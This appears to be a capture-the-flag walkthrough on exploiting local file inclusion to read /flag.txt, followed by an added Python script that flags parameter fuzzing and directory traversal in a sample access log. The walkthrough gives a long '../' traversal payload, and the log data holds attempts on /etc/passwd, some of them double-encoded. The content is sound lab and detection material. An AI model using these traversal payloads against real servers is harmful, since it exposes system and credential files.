Automated Scanning

Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt

Step 1 - Fuzz parameters:

Step 2 - Fuzz LFI payloads:

Step 3 - Test one of the discovered payloads:

  • Append the payload to the application URL:

Step 4 - Get the flag:

  • Now simply replace /etc/passwd with /flag.txt in the payload:

    • ../../../../../../../../../../../../../../../../../../../../../../flag.txt

And flag found!
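Seen from the server side, the steps above leave two signals in the access log: one client trying many different parameter names, then parameter values that climb directories with `../`. The following is an added example, not part of the original walkthrough, that detects both. The log lines, the `/index.php` path, the `language` parameter and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access log (hypothetical clients, path and parameter names).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 2287
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=1 HTTP/1.1" 200 2287
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?file=1 HTTP/1.1" 200 2287
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?language=1 HTTP/1.1" 200 2309
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?language=../../../../etc/passwd HTTP/1.1" 200 3390
203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?language=%252e%252e%252f%252e%252e%252fflag.txt HTTP/1.1" 200 2320
198.51.100.20 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?language=en HTTP/1.1" 200 2309
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so nested encodings are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")  # treat Windows separators the same way

def traversal_depth(value):
    """Number of '..' path segments in the normalised value."""
    return sum(1 for seg in fully_decode(value).split("/") if seg == "..")

def scan(log_text, fuzz_threshold=3):
    """Return (clients probing many parameter names, traversal hits)."""
    params_seen = defaultdict(set)
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl already decodes once; fully_decode handles deeper nesting.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            params_seen[client].add(name)
            depth = traversal_depth(value)
            if depth:
                hits.append((client, name, fully_decode(value), depth))
    fuzzers = sorted(c for c, n in params_seen.items() if len(n) >= fuzz_threshold)
    return fuzzers, hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Detection of this kind complements the actual fix, which is to resolve the requested path on the server and refuse anything that falls outside the intended directory.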
